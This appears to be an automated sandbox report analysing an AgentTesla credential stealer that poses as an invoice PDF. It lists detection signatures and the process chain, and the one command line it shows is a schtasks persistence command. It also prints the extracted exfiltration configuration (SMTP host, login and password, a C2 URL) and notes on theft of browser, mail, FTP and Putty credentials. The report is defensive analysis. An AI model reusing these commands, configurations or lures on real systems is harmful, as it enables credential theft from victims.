Play interactive tour

Edit tour

Analysis Report Proforma Invoice with Bank Details_pdf.exe

Overview

General Information

Sample Name:	Proforma Invoice with Bank Details_pdf.exe
Analysis ID:	323892
MD5:	8816ae2d440c50e7ec52be21ae6e2b22
SHA1:	210289b9df203f83f263fe2530aa28c078b8d6c1
SHA256:	d2146d63100b68c87046aa63c8e5b73a8893e171f24c3500070005ccea0eaacd
Tags:	AgentTeslaexe
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: MSBuild connects to smtp port

Yara detected AgentTesla

.NET source code contains potential unpacker

Initial sample is a PE file and has a suspicious name

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Startup

System is w10x64

Proforma Invoice with Bank Details_pdf.exe (PID: 6672 cmdline: 'C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe' MD5: 8816AE2D440C50E7EC52BE21AE6E2B22)

conhost.exe (PID: 6680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6736 cmdline: cmd /c schtasks /Create /TN name /XML 'C:\Users\user\AppData\Local\Temp\eb880290d3c747809c5fd1c3af592ae7.xml' MD5: F3BDBE3BB6F734E357235F4D5898582D)

schtasks.exe (PID: 6756 cmdline: schtasks /Create /TN name /XML 'C:\Users\user\AppData\Local\Temp\eb880290d3c747809c5fd1c3af592ae7.xml' MD5: 15FF7D8324231381BAD48A052F85DF04)

MSBuild.exe (PID: 6744 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe MD5: 88BBB7610152B48C2B3879473B17857E)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "umfkxJ05b", "URL: ": "http://AAETsHFcmz5EiUda3E.net", "To: ": "", "ByHost: ": "mail.hybridgroupco.com:587", "Password: ": "IvIoSkuTkG", "From: ": ""}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.473024653.0000000002C01000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.473614554.0000000002CCE000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.469545862.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.474100533.0000000002DA4000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: MSBuild.exe PID: 6744	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: MSBuild.exe PID: 6744	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Proforma Invoice with Bank Details_pdf.exe PID: 6672	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Proforma Invoice with Bank Details_pdf.exe.c40000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.2.MSBuild.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Sigma Overview

System Summary:

Sigma detected: MSBuild connects to smtp port

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 66.70.204.222, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, Initiated: true, ProcessId: 6744, Protocol: tcp, SourceIp: 192.168.2.3, SourceIsIpv6: false, SourcePort: 49725

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: MSBuild.exe.6744.3.memstr

Malware Configuration Extractor: Agenttesla {"Username: ": "umfkxJ05b", "URL: ": "http://AAETsHFcmz5EiUda3E.net", "To: ": "", "ByHost: ": "mail.hybridgroupco.com:587", "Password: ": "IvIoSkuTkG", "From: ": ""}

Multi AV Scanner detection for domain / URL

Show sources

Source: mail.hybridgroupco.com

Virustotal: Detection: 9%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: Proforma Invoice with Bank Details_pdf.exe	Virustotal: Detection: 30%			Perma Link
Source: Proforma Invoice with Bank Details_pdf.exe	ReversingLabs: Detection: 27%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\folder\file.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: Proforma Invoice with Bank Details_pdf.exe

Joe Sandbox ML: detected

Source: 3.2.MSBuild.exe.400000.0.unpack

Avira: Label: TR/Spy.Gen8

Source: global traffic

TCP traffic: 192.168.2.3:49725 -> 66.70.204.222:587

Source: Joe Sandbox View

IP Address: 66.70.204.222 66.70.204.222

Source: Joe Sandbox View

ASN Name: OVHFR OVHFR

Source: global traffic

TCP traffic: 192.168.2.3:49725 -> 66.70.204.222:587

Source: unknown	TCP traffic detected without corresponding DNS query: 13.83.66.189
Source: unknown	TCP traffic detected without corresponding DNS query: 13.83.66.189
Source: unknown	TCP traffic detected without corresponding DNS query: 13.83.66.189
Source: unknown	TCP traffic detected without corresponding DNS query: 13.83.66.189
Source: unknown	TCP traffic detected without corresponding DNS query: 13.83.66.189
Source: unknown	TCP traffic detected without corresponding DNS query: 13.83.66.189
Source: unknown	TCP traffic detected without corresponding DNS query: 13.83.66.189
Source: unknown	TCP traffic detected without corresponding DNS query: 13.83.66.189
Source: unknown	TCP traffic detected without corresponding DNS query: 13.83.66.189
Source: unknown	TCP traffic detected without corresponding DNS query: 13.83.66.189
Source: unknown	TCP traffic detected without corresponding DNS query: 13.83.66.189
Source: unknown	TCP traffic detected without corresponding DNS query: 13.83.66.189
Source: unknown	TCP traffic detected without corresponding DNS query: 13.83.66.189
Source: unknown	TCP traffic detected without corresponding DNS query: 13.83.66.189
Source: unknown	TCP traffic detected without corresponding DNS query: 13.83.66.189
Source: unknown	TCP traffic detected without corresponding DNS query: 13.83.66.189
Source: unknown	TCP traffic detected without corresponding DNS query: 13.83.66.189
Source: unknown	TCP traffic detected without corresponding DNS query: 13.83.66.189
Source: unknown	TCP traffic detected without corresponding DNS query: 13.83.66.189
Source: unknown	TCP traffic detected without corresponding DNS query: 13.83.66.189
Source: unknown	TCP traffic detected without corresponding DNS query: 13.83.66.189
Source: unknown	TCP traffic detected without corresponding DNS query: 104.108.38.112
Source: unknown	TCP traffic detected without corresponding DNS query: 104.108.38.112
Source: unknown	TCP traffic detected without corresponding DNS query: 205.185.216.10
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 104.108.60.202
Source: unknown	TCP traffic detected without corresponding DNS query: 104.108.60.202
Source: unknown	TCP traffic detected without corresponding DNS query: 104.108.60.202
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 104.80.21.45
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 13.83.66.189
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 205.185.216.10
Source: unknown	TCP traffic detected without corresponding DNS query: 67.27.233.126
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 67.27.233.126
Source: unknown	TCP traffic detected without corresponding DNS query: 205.185.216.10
Source: unknown	TCP traffic detected without corresponding DNS query: 13.83.66.189
Source: unknown	TCP traffic detected without corresponding DNS query: 13.83.66.189
Source: unknown	TCP traffic detected without corresponding DNS query: 13.83.66.189
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 67.27.233.126
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29

Source: unknown

DNS traffic detected: queries for: mail.hybridgroupco.com

Source: Proforma Invoice with Bank Details_pdf.exe, Proforma Invoice with Bank Details_pdf.exe, 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp, MSBuild.exe, 00000003.00000002.469545862.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: http://127.0.0.1:
Source: MSBuild.exe, 00000003.00000002.474100533.0000000002DA4000.00000004.00000001.sdmp	String found in binary or memory: http://AAETsHFcmz5EiUda3E.net
Source: MSBuild.exe, 00000003.00000002.473614554.0000000002CCE000.00000004.00000001.sdmp	String found in binary or memory: http://AAETsHFcmz5EiUda3E.net0
Source: Proforma Invoice with Bank Details_pdf.exe, Proforma Invoice with Bank Details_pdf.exe, 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp, MSBuild.exe, 00000003.00000002.469545862.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot%telegramapi%/
Source: Proforma Invoice with Bank Details_pdf.exe	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/
Source: Proforma Invoice with Bank Details_pdf.exe, MSBuild.exe, 00000003.00000002.469545862.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: Proforma Invoice with Bank Details_pdf.exe, 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp, MSBuild.exe, 00000003.00000002.469545862.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/U

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49678
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49688
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49686
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49679 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49688 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49679

System Summary:

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample	Static PE information: Filename: Proforma Invoice with Bank Details_pdf.exe
Source: initial sample	Static PE information: Filename: Proforma Invoice with Bank Details_pdf.exe

Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: 0_2_00C550D1	0_2_00C550D1
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: 0_2_00C56845	0_2_00C56845
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: 0_2_00C5584D	0_2_00C5584D
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: 0_2_00C4A1A4	0_2_00C4A1A4
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: 0_2_00C48283	0_2_00C48283
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: 0_2_00C493F9	0_2_00C493F9
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: 0_2_00C48B8F	0_2_00C48B8F
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: 0_2_00C4E3B9	0_2_00C4E3B9
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: 0_2_00C54B61	0_2_00C54B61
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: 0_2_00C545F1	0_2_00C545F1
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: 0_2_00C48FC4	0_2_00C48FC4
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: 0_2_00C47F60	0_2_00C47F60
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: 0_2_00C48777	0_2_00C48777
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FADCB9	3_2_04FADCB9
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FA7AA0	3_2_04FA7AA0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FA9498	3_2_04FA9498
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FACC4F	3_2_04FACC4F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FA821F	3_2_04FA821F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FAEC1F	3_2_04FAEC1F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04F90006	3_2_04F90006
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FA31F8	3_2_04FA31F8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FA3588	3_2_04FA3588
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FA1568	3_2_04FA1568
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FA713E	3_2_04FA713E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FA9120	3_2_04FA9120
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FA1D20	3_2_04FA1D20
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FA3588	3_2_04FA3588
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FA56E3	3_2_04FA56E3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FA28C8	3_2_04FA28C8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FA28BA	3_2_04FA28BA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FA58BD	3_2_04FA58BD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FAA4B2	3_2_04FAA4B2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FA2099	3_2_04FA2099
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FA7A8F	3_2_04FA7A8F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FA564A	3_2_04FA564A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FA9E18	3_2_04FA9E18
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FAB7F8	3_2_04FAB7F8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FA49CE	3_2_04FA49CE
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FA85C1	3_2_04FA85C1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FA7BA8	3_2_04FA7BA8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FA7F88	3_2_04FA7F88
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FA6B82	3_2_04FA6B82
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FACC4F	3_2_04FACC4F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FA577C	3_2_04FA577C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FA1558	3_2_04FA1558
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FA6D45	3_2_04FA6D45
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FA2136	3_2_04FA2136
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_04FA1D10	3_2_04FA1D10
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F307F0	3_2_05F307F0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F359C8	3_2_05F359C8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F35370	3_2_05F35370
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F33740	3_2_05F33740
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F30D10	3_2_05F30D10
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F37710	3_2_05F37710
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F31CC0	3_2_05F31CC0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F38658	3_2_05F38658
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F37E08	3_2_05F37E08
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F37DF8	3_2_05F37DF8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F307D3	3_2_05F307D3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F30DCD	3_2_05F30DCD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F363CC	3_2_05F363CC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F30DBB	3_2_05F30DBB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F33731	3_2_05F33731
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F31115	3_2_05F31115
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F30D01	3_2_05F30D01
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F37700	3_2_05F37700
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F308D6	3_2_05F308D6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F31CB3	3_2_05F31CB3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F372BC	3_2_05F372BC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F31EA3	3_2_05F31EA3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F30E93	3_2_05F30E93
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F37E87	3_2_05F37E87
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F30E6A	3_2_05F30E6A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F38648	3_2_05F38648
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F30A2A	3_2_05F30A2A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F32414	3_2_05F32414
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F4A148	3_2_05F4A148
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F4AED0	3_2_05F4AED0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F4EAD0	3_2_05F4EAD0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F4BE50	3_2_05F4BE50
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F4B250	3_2_05F4B250

Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe

Code function: String function: 00C4AF50 appears 39 times

Source: Proforma Invoice with Bank Details_pdf.exe	Binary or memory string: OriginalFilename vs Proforma Invoice with Bank Details_pdf.exe
Source: Proforma Invoice with Bank Details_pdf.exe, 00000000.00000003.205412201.00000000030AF000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Proforma Invoice with Bank Details_pdf.exe
Source: Proforma Invoice with Bank Details_pdf.exe, 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenameyZFlSsyWYLpOIrYUuUqNGPSmFjhfv.exe4 vs Proforma Invoice with Bank Details_pdf.exe

Source: 3.2.MSBuild.exe.400000.0.unpack, gtu.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.MSBuild.exe.400000.0.unpack, gtu.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 3.2.MSBuild.exe.400000.0.unpack, gtu.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 3.2.MSBuild.exe.400000.0.unpack, DPAPI.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 3.2.MSBuild.exe.400000.0.unpack, DPAPI.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/2@1/1

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6680:120:WilError_01

Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe

File created: C:\Users\user\AppData\Local\Temp\folder

Jump to behavior

Source: Proforma Invoice with Bank Details_pdf.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Proforma Invoice with Bank Details_pdf.exe	Virustotal: Detection: 30%
Source: Proforma Invoice with Bank Details_pdf.exe	ReversingLabs: Detection: 27%

Source: Proforma Invoice with Bank Details_pdf.exe	String found in binary or memory: </UserId><LogonType>InteractiveToken</LogonType><RunLevel>LeastPrivilege</RunLevel></Principal></Principals><Settings><MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy><AllowHardTerminate>false</AllowHardTerminate><StartWhenAvailable>true</StartWhenAvailable><RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable><IdleSettings><StopOnIdleEnd>true</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings><AllowStartOnDemand>true</AllowStartOnDemand><Enabled>true</Enabled><Hidden>false</Hidden><RunOnlyIfIdle>false</RunOnlyIfIdle><WakeToRun>false</WakeToRun><ExecutionTimeLimit>PT0S</ExecutionTimeLimit><Priority>7</Priority></Settings><Actions Context="Author"><Exec><Command>
Source: Proforma Invoice with Bank Details_pdf.exe	String found in binary or memory: </UserId><LogonType>InteractiveToken</LogonType><RunLevel>LeastPrivilege</RunLevel></Principal></Principals><Settings><MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy><AllowHardTerminate>false</AllowHardTerminate><StartWhenAvailable>true</StartWhenAvailable><RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable><IdleSettings><StopOnIdleEnd>true</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings><AllowStartOnDemand>true</AllowStartOnDemand><Enabled>true</Enabled><Hidden>false</Hidden><RunOnlyIfIdle>false</RunOnlyIfIdle><WakeToRun>false</WakeToRun><ExecutionTimeLimit>PT0S</ExecutionTimeLimit><Priority>7</Priority></Settings><Actions Context="Author"><Exec><Command>

Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe

File read: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe 'C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks /Create /TN name /XML 'C:\Users\user\AppData\Local\Temp\eb880290d3c747809c5fd1c3af592ae7.xml'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /TN name /XML 'C:\Users\user\AppData\Local\Temp\eb880290d3c747809c5fd1c3af592ae7.xml'
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks /Create /TN name /XML 'C:\Users\user\AppData\Local\Temp\eb880290d3c747809c5fd1c3af592ae7.xml'	Jump to behavior
